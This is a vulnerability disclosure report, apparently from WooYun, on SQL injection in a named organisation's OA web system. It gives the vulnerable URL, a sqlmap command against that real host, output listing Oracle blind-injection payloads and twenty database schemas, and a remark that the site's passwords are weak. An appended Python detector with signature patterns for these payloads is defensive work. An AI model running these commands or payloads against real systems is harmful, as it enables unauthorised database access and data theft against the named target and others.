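2016-01-28: Details reported to the vendor; waiting for the vendor to handle them.
2016-02-02: The vendor chose to ignore the vulnerability; details disclosed to the public.
As the title says.
The problem is at http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1. Adding one row of data is enough.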
sqlmap -u "http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1" --dbs
[01:08:13] [INFO] resuming back-end DBMS 'oracle'
[01:08:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7829=7829

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=1 AND 3066=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(117)||CHR(66)||CHR(120),5)
---
[01:08:13] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[01:08:13] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[01:08:13] [INFO] fetching database (schema) names
[01:08:13] [INFO] fetching number of databases
[01:08:13] [INFO] resumed: 20
[01:08:13] [INFO] resumed: AVICPX4
[01:08:13] [INFO] resumed: BAK
[01:08:13] [INFO] resumed: CTXSYS
[01:08:13] [INFO] resumed: DBSNMP
[01:08:13] [INFO] resumed: DMSYS
[01:08:13] [INFO] resumed: ECOLOGYTEST
[01:08:13] [INFO] resumed: EXFSYS
[01:08:13] [INFO] resumed: MDSYS
[01:08:13] [INFO] resumed: OA
[01:08:13] [INFO] resumed: OA0628
[01:08:13] [INFO] resumed: OLAPSYS
[01:08:13] [INFO] resumed: ORDSYS
[01:08:13] [INFO] resumed: OUTLN
[01:08:13] [INFO] resumed: SCOTT
[01:08:13] [INFO] resumed: SYS
[01:08:13] [INFO] resumed: SYSMAN
[01:08:13] [INFO] resumed: SYSTEM
[01:08:13] [INFO] resumed: TSMSYS
[01:08:13] [INFO] resumed: WMSYS
[01:08:13] [INFO] resumed: XDB
available databases [20]:
[*] AVICPX4
[*] BAK
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] ECOLOGYTEST
[*] EXFSYS
[*] MDSYS
[*] OA
[*] OA0628
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Lots of weak passwords
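The passwords are all 1
Please fix it.
Severity: No impact (ignored by vendor)
Ignored on: 2016-02-02 15:10
Vulnerability Rank: 4 (WooYun rating)
2016-03-02: This vulnerability has been fixed.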
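
The two payload styles in the sqlmap output above (boolean-based blind and Oracle time-based blind on the `id` parameter) leave recognizable traces in web server access logs. The following is an added example, not part of the original report: it flags requests whose `id` value is not a plain integer and labels the payload style. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; the client IPs are documentation addresses.
PAGE = "/web/careerapply/HrmCareerApplyPerView.jsp"
SAMPLE_LOG = [
    f'192.0.2.10 - - [28/Jan/2016:01:07:59 +0800] "GET {PAGE}?id=1 HTTP/1.1" 200 5120',
    f'192.0.2.77 - - [28/Jan/2016:01:08:02 +0800] "GET {PAGE}?id=1%20AND%207829%3D7829 HTTP/1.1" 200 5120',
    f'192.0.2.77 - - [28/Jan/2016:01:08:07 +0800] "GET {PAGE}?id=1%20AND%203066%3DDBMS_PIPE.RECEIVE_MESSAGE'
    '%28CHR%28117%29%7C%7CCHR%28117%29%7C%7CCHR%2866%29%7C%7CCHR%28120%29%2C5%29 HTTP/1.1" 200 5120',
]

# Signatures for the payload styles shown in the sqlmap output.
RULES = [
    # AND/OR followed by N=N with the same number on both sides (tautology probe).
    ("boolean-blind", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
    # Oracle delay primitive used for time-based blind injection.
    ("oracle-time-delay", re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE", re.I)),
    # CHR(n)||CHR(n) string building, used to avoid quote characters.
    ("chr-concat", re.compile(r"CHR\(\d+\)\s*\|\|", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def inspect_id(value):
    """Return labels for a decoded `id` value; an empty list means a plain integer."""
    if re.fullmatch(r"\d{1,10}", value):
        return []
    hits = [name for name, rx in RULES if rx.search(value)]
    return hits or ["non-numeric"]


def scan(lines):
    """Return (client_ip, labels) for each request whose `id` is not an integer."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs URL-decodes the value, so encoded payloads are matched too.
        for value in parse_qs(query, keep_blank_values=True).get("id", []):
            labels = inspect_id(value)
            if labels:
                findings.append((line.split()[0], labels))
    return findings


if __name__ == "__main__":
    for ip, labels in scan(SAMPLE_LOG):
        print(ip, ", ".join(labels))
```

The same strict-integer check in `inspect_id` is what the server side should enforce on `id` before the value reaches a query, alongside bind variables.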